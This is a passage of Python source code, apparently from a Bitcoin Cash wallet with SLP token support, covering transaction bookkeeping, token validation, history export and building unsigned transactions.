ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
### SLP: Handle incoming SLP transaction outputs here
self.handleSlpTransaction(tx_hash, tx)
"""
Callers are expected to take lock(s). We take no locks
"""
def handleSlpTransaction(self, tx_hash, tx):
txouts = tx.outputs()
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
token_type = 'SLP%d'%(e.args[0],)
for i, (_type, addr, _) in enumerate(txouts):
if _type == TYPE_ADDRESS and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': token_type,
'qty': None,
'token_id': None,
}
return
except (SlpParsingError, IndexError, OpreturnError):
return
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# truncate outputs list
amounts = slpMsg.op_return_fields['token_output'][:len(txouts)]
for i, qty in enumerate(amounts):
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS and qty > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': qty,
}
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx_hash
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['initial_token_mint_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['initial_token_mint_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == "MINT":
token_id_hex = slpMsg.op_return_fields['token_id_hex']
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['additional_token_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['additional_token_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == 'COMMIT':
# ignore COMMs, they aren't producing any tokens.
return
else:
raise RuntimeError(slpMsg.transaction_type)
# On receiving a new SEND, MINT, or GENESIS always add entry to token_types if wallet hasn't seen tokenId yet
if slpMsg.transaction_type in [ 'SEND', 'MINT', 'GENESIS' ]:
if slpMsg.transaction_type == 'GENESIS':
tokenid = tx_hash
else:
tokenid = slpMsg.op_return_fields['token_id_hex']
new_token = True
for k, v in self.tx_tokinfo.items():
try:
if v['token_id'] == tokenid:
new_token = False
except KeyError:
pass
if new_token and tokenid not in self.token_types:
tty = { 'class': 'SLP%d'%(slpMsg.token_type,),
'decimals': "?",
'name': 'unknown-' + tokenid[:6]
}
if slpMsg.token_type == 65:
tty['group_id'] = "?"
self.token_types[tokenid] = tty
# Always add entry to tx_tokinfo
tti = { 'type':'SLP%d'%(slpMsg.token_type,),
'transaction_type':slpMsg.transaction_type,
'token_id': token_id_hex,
'validity': 0,
}
self.tx_tokinfo[tx_hash] = tti
if self.is_slp: # Only start up validation if SLP enabled
self.slp_check_validation(tx_hash, tx)
def slp_check_validation(self, tx_hash, tx):
""" Callers are expected to take lock(s). We take no locks """
tti = self.tx_tokinfo[tx_hash]
try:
is_new = self.token_types[tti['token_id']]['decimals'] == '?'
except:
is_new = False
if tti['validity'] == 0 and tti['token_id'] in self.token_types and not is_new and tti['type'] in ['SLP1','SLP65','SLP129']:
def callback(job):
(txid,node), = job.nodes.items()
val = node.validity
tti['validity'] = val
if slp_gs_mgr.slp_validity_signal is not None:
slp_gs_mgr.slp_validity_signal.emit(txid, val)
if tti['type'] == 'SLP1':
job = self.slp_graph_0x01.make_job(tx, self, self.network,
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
elif tti['type'] in ['SLP65', 'SLP129']:
job = self.slp_graph_0x01_nft.make_job(tx, self, self.network, nft_type=tti['type'],
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
if job is not None:
job.add_callback(callback)
# This was commented out because it spammed the log so badly
# it impacted performance. SLP validation can create a *lot* of jobs!
#finalization_print_error(job, f"[{self.basename()}] Job for {tx_hash} type {tti['type']} finalized")
def rebuild_slp(self,):
"""Wipe away old SLP transaction data and rerun on the entire tx set.
"""
with self.lock:
self._slp_txo = defaultdict(lambda: defaultdict(dict))
self.tx_tokinfo = {}
for txid, tx in self.transactions.items():
self.handleSlpTransaction(txid, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
self.tx_fees.pop(tx_hash, None)
self.tx_tokinfo[tx_hash] = {}
for addr, addrdict in self._slp_txo.items():
if tx_hash in addrdict: addrdict[tx_hash] = {}
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_slp_history(self, domain=None, validities_considered=(None,0,1)):
history = []
histories = self.get_slp_histories(domain=domain, validities_considered=validities_considered)
# Take separate token histories and flatten them, then sort them.
for token_id,t_history in histories.items():
for tx_hash, height, conf, timestamp, delta in t_history:
history.append((tx_hash, height, conf, timestamp, delta, token_id))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
return history
def get_slp_histories(self, domain=None, validities_considered=(0,1)):
# Based on get_history.
# We return a dict of histories, one history per token_id.
# get domain
if domain is None:
domain = self.get_addresses()
#1. Big iteration to find all deltas and put them in the right place.
token_tx_deltas = defaultdict(lambda: defaultdict(int)) # defaultdict of defaultdicts of ints :)
for addr in domain:
h = self.get_address_history(addr)
with self.lock:
addrslptxo = self._slp_txo[addr]
for tx_hash, height in h:
if tx_hash in self.pruned_txo.values():
continue
tti = self.tx_tokinfo.get(tx_hash)
if tti and tti['validity'] in validities_considered:
txdict = addrslptxo.get(tx_hash,{})
for idx,d in txdict.items():
if isinstance(d['qty'],int):
token_tx_deltas[d['token_id']][tx_hash] += d['qty'] # received!
# scan over all txi's, trying to find if they were tokens, which tokens, and how much
# (note that non-SLP txes can spend (burn) SLP --- and SLP of tokenA can burn tokenB)
for n, _ in self.txi.get(tx_hash, {}).get(addr, ()):
prevtxid, prevout_str = n.rsplit(':',1)
tti = self.tx_tokinfo.get(prevtxid)
if not (tti and tti['validity'] in validities_considered):
continue
prevout = int(prevout_str)
d = addrslptxo.get(prevtxid,{}).get(prevout,{})
if isinstance(d.get('qty',None),int):
token_tx_deltas[d['token_id']][tx_hash] -= d['qty'] # received!
# 2. create history (no sorting needed since balances won't be computed)
histories = {}
for token_id, tx_deltas in token_tx_deltas.items():
history = histories[token_id] = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
# 3. At this point we could compute running balances, but let's not.
return histories
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab bch history
h = self.get_history(domain, reverse=True)
out = []
# grab slp history
_slp_h = self.get_slp_history(domain=domain, validities_considered=(None,0,1,2,3,4))
def fmt_slp_amt(v, decimals):
if v is None:
return '--'
if decimals == "?":
decimals = 0
return format_satoshis(v, decimal_point=int(decimals), is_diff=True)
def get_token_info(token_id):
return self.token_types.get(token_id, {
'class': '?',
'decimals': 0,
'name': 'unknown'
})
slp_h = dict((tx_hash, { \
'value': fmt_slp_amt(delta, get_token_info(token_id)['decimals']), \
'token_id': token_id, \
'name': get_token_info(token_id)['name'] \
}) for tx_hash, _, _, _, delta, token_id in _slp_h)
def get_slp_tx(tx_hash):
if slp_h.get(tx_hash) is None:
return { 'value': '--', 'name': '--', 'token_id': '--' }
return slp_h.get(tx_hash)
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
slp_info = get_slp_tx(tx_hash)
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
'slp_value' : slp_info['value'],
'slp_name' : slp_info['name'],
'slp_token_id' : slp_info['token_id']
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def check_sufficient_slp_balance(self, slpMessage, config):
if self.is_slp:
if slpMessage.transaction_type == 'SEND':
total_token_out = sum(slpMessage.op_return_fields['token_output'])
valid_token_balance, _, _, valid_unfrozen_token_balance, _ = self.get_slp_token_balance(slpMessage.op_return_fields['token_id_hex'], config)
if total_token_out > valid_token_balance:
raise NotEnoughFundsSlp()
elif total_token_out > valid_unfrozen_token_balance:
raise NotEnoughUnfrozenFundsSlp()
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None, *, mandatory_coins=[]):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
for item in mandatory_coins:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [self.get_addresses()[0]]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr,
mandatory_coins=mandatory_coins)
else:
inputs = mandatory_coins + inputs
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Sort the inputs and outputs deterministically
if not mandatory_coins:
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def make_unsigned_transaction_for_bitcoinfiles(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info_for_bitcoinfiles(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
